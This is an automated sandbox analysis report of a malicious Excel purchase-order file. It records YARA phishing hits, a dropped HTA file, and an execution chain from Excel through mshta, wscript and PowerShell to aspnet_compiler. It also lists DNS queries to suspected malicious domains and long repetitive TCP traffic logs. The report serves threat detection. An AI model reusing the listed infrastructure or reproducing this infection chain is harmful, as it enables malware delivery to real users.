Windows Analysis Report PO#BBGR2411PO69.xls

Yara detected HtmlPhish44

Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Phishing

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta, type: DROPPED

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49172 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Document exploit detected (process start blacklist hit)

Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49169 version: TLS 1.2

Source:	Binary string: .pdb>Uxx source: powershell.exe, 00000013.00000002.490184350.000000001AB44000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdb source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdbhP source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdbhP source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdb source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: 1016.filemail.com
Source: global traffic	DNS query: name: 1016.filemail.com
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: linkjago.me
Source: global traffic	DNS query: name: 1016.filemail.com
Source: global traffic	DNS query: name: 1016.filemail.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 146.70.113.200:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.6:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 142.215.209.77:443
